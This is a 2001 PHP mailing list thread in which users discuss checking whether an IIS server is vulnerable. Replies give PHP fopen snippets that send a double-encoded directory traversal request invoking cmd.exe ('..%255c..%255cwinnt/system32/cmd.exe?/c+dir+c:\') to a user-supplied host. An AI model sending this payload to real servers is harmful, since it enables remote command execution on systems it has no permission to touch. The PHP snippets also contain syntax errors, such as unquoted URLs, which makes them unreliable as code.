that is basically going to the URL
www.whatever.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
so do what the other guy said
> $site = fopen(http://www.whatever.com/, "r");
> $contents = fread($site, 102400);
> fclose($site);
but like this:
> $site =
fopen(http://www.whatever.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/
c+dir+c:\, "r");
> $contents = fread($site, 102400);
> fclose($site);
BTW there are MANY MANY MANY versions of this vulenabilty. so just checking
this one won't cover them all. Check out www.SecurityFocus.com and click the
Vulnibilitys link on the left
Andrew
----- Original Message -----
From: "Clayton Dukes" <[EMAIL PROTECTED]>
To: "Matthew Loff" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Tuesday, July 17, 2001 7:37 PM
Subject: Re: [PHP] GET Command
> MessageHi,
> Here's what I'm trying to do:
>
> I want to test an IIS server for an invulnerability. This is done by
sending
> a GET command to test for it.
> Here's a blurb from the security advisory that I am working with:
>
> ---snip---
> A scan is performed over some region of the Internet, searching for web
> servers accepting TCP connections on port 80. A specially formed "HTTP
GET"
> request is then sent over the accepted connection to the server:
> GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
> ---snip---
>
> How can I do a simple page where, the user inputs the url
(www.whatever.com)
> And it runs this test, telling the user if it passes or fails, and returns
> the output?
>
> Btw, the security advisory comes from http://grc.com/dos/grcdos.htm which
> outlines some very interesting things happening with IRC based DoS
attacks,
> in case your interested.
>
>
> Thanks!
>
>
> Clayton Dukes
> CCNA, CCDA, CCDP, CCNP
> (c) 904.477.7825
> (h) 904.292.1881
> Download Free Essays, Term Papers and Cisco Training from
http://www.gdd.net
>
>
> ----- Original Message -----
> From: Matthew Loff
> To: 'Clayton Dukes' ; [EMAIL PROTECTED]
> Sent: Tuesday, July 17, 2001 2:11 PM
> Subject: RE: [PHP] GEt Command
>
>
>
> $site = fopen(http://www.whatever.com/, "r");
> $contents = fread($site, 102400);
> fclose($site);
>
> -----Original Message-----
> From: Clayton Dukes [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, July 17, 2001 2:08 PM
> To: [EMAIL PROTECTED]
> Subject: [PHP] GEt Command
>
>
> Does anyone have a simple script that will GET a web page and return the
> reply?
>
> Something like this:
>
> function getpage($host, $path, getstr) {
> $getstr="whatever\r\n";
> $host=www.whatever.com;
>
> $hdr=sprintf("GET $getstr", $path);
> $hdr .="Content-type: application/x-www-form-urlencoded\r\n";
> $hdr .="Accept: text/html\r\nAccept: text/plain\r\n";
> $hdr .="User-Agent: Mozilla/1.0\r\n\r\n";
>
> $fp = fsockopen($host , 80, &$errno, &$errstr, 45);
> if (!$fp) {
> echo "$host open error: $errstr $errno .\n";
> return(0);
> } else {
> fputs($fp,$hdr.$poststr);
> return($fp);
> }
> }
>
> while (!feof($fp)) {
> $buff=fgets($fp, 1024);
> //dofoo($buff);
> echo "$buff";
> }
> fclose($fp);
>
>
> TIA!
>
> Clayton Dukes
> CCNA, CCDA, CCDP, CCNP
> (c) 904.477.7825
> (h) 904.292.1881
> Download Free Essays, Term Papers and Cisco Training from
http://www.gdd.net
>
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, e-mail: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
> To contact the list administrators, e-mail: [EMAIL PROTECTED]
>
>
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
